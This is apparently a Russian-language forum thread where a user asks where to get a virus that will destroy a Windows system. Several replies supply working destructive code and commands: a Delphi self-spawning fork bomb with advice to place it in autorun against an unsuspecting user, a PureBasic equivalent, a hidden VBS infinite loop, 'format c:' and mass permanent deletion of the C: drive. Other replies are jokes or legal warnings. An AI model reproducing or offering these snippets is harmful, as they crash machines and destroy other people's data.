Другие языки программирования и технологии

где скачать мощный вирус? шоб систему снесло

G.g-Life Black
напиши сам. на asm или delphi
на делфе эффективное западло можно устроить написав
programm project1
uses windows
begin
winexec(pchar(paramstr(0)),sw_hide);
end;

она займет всю память и система будет очень жоско лагать пока не вылезет bsod, а если его еще в авторан прописать, то ламер 98 % сам добровольно снесет форточки и переставит, вместо того чтобы искать причину.
а просто грохнуть систему за 1 раз - имхо это тупо и не интересно
Мамедов Рафаил
Лучший ответ
самый страшный вирус- это тот, что сидит перед монитором! Поищите на xakep. ru
Alexey A. Gorchakov
Зайди в корень диска С и быстро нажми комбинации клавиш
ctrl+a
shift+del
enter
Спецэффект гарантирован.
Дмитро Семенюк
На PureBasic, "вирус".

RunProgram(ProgramFilename())
Сергей Шлапак
снеси её сам
Олег Азаров
позови человека, ничего не знающего о компьютерах и оставь часа на 2:)
Артем Пьянков
Где именно скачать, писать - это статтья КК.
А вот какой проблематичный то могу - Virus.Win32.Sality
О многих других можеш прочитать здесь - www.securlist.com/ru
Андрей Вяткин
Набери в командной строке format c:\
храниение и распространение вирусов 5-7 лет лишения свободы с конфискацией имущества.
набираешь ПОРНО в гугле и открываешь подряд все сайты. На каждом пятом - вирус, на каждом двадцатом - вирус, который снесет систему.
format c и вирус не нужен
Vbs:
do
loop
Скрытая программа, система будет лагать. Не работает на win10 (надо 2 раза запустить), жестко тормозит!
сами ищем)
пошел нах уй
Петя Заика
Можно сделать Bat'nik который уничтожит систему...
Rasul Kuvandykov